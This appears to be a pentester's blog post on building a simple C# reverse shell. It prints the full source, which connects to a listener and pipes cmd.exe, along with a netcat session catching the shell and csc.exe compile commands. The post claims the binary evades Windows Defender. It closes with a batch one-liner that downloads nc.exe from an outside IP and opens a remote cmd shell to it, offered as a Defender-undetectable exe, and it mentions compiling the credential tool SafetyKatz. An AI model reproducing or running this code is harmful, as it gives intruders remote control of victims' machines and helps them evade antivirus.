C# Simple Reverse Shell Code writing
Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:
using System; using System.Text; using System.IO; using System.Diagnostics; using System.ComponentModel; using System.Linq; using System.Net; using System.Net.Sockets; namespace ConnectBack { public class Program { static StreamWriter streamWriter; public static void Main(string[] args) { using(TcpClient client = new TcpClient("10.0.2.15", 443)) { using(Stream stream = client.GetStream()) { using(StreamReader rdr = new StreamReader(stream)) { streamWriter = new StreamWriter(stream); StringBuilder strInput = new StringBuilder(); Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); //strInput.Append("\n"); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } } }
I put my kali in listening mode on 443 port with netcat, compiled and executed my code.
As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.
Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.
root@kali:~# nc -lvp 443 listening on [any] 443 ... 192.168.178.14: inverse host lookup failed: Unknown host connect to [192.168.178.16] from (UNKNOWN) [192.168.178.14] 25852 Microsoft Windows [Version 10.0.17134.523] (c) 2018 Microsoft Corporation. All rights reserved. C:\PENTEST> C:\PENTEST>whoami lt-jacco\jacco
Running the exe file will spawn immediately the shell on my Kali.
Finding the C# compiler (csc.exe)
dir /s %WINDIR%\CSC.EXE
Compiling
c:\PENTEST>c:\windows\Microsoft.NET\Framework\v3.5\csc.exe /t:exe /out:Simple_Rev_Shell443.exe Simple_Rev_Shell443.cs Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.8931 for Microsoft (R) .NET Framework version 3.5 Copyright (C) Microsoft Corporation. All rights reserved. Simple_Rev_Shell443.cs(64,34): warning CS0168: The variable 'err' is declared but never used c:\PENTEST>dir Simple_Rev_Shell443.* Volume in drive C is Boot Volume Serial Number is 9488-7836 Directory of c:\PENTEST 09/02/2019 19:45 1.822 Simple_Rev_Shell443.cs 10/02/2019 10:27 5.120 Simple_Rev_Shell443.exe 2 File(s) 6.942 bytes 0 Dir(s) 6.854.045.696 bytes free
reference used : https://github.com/itaykrk/CSharp-reverse-tcp
Not for this, but if compiling saftykatz32.exe Why do I get the following error? Unsafe code may only appear if compiling with /unsafe”?vI work in C# and Visual Studio 2015 for programming on Windows .
To use unsafe code blocks, the project has to be compiled with the /unsafe switch on.
Open the properties for the project, go to the Build
tab and check the Allow unsafe code
checkbox.
Or use below :
Super Tip : https://www.battoexeconverter.com/ use it to convert puckie.bat [ containing : powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://31.21.73.15/nc.exe','nc.exe')"; Start-Process nc.exe -NoNewWindow -Argumentlist '31.21.73.15 53 -e cmd.exe' ] to puckie.exe -> and you have an Defender undetectable exe file to create a remote shell !!!
Battoexeconverter (https://battoexeconverter.com/)
Flawlessly compile Batch Files to .EXE that work on all Windows versions, configurations and languages. Extra powerful commands and Graphics.
Advanced BAT to EXE Converter v4.11 - Official Site - Compile batch files to .EXE with Extra commands and Graphics
Author : Jacco Straathof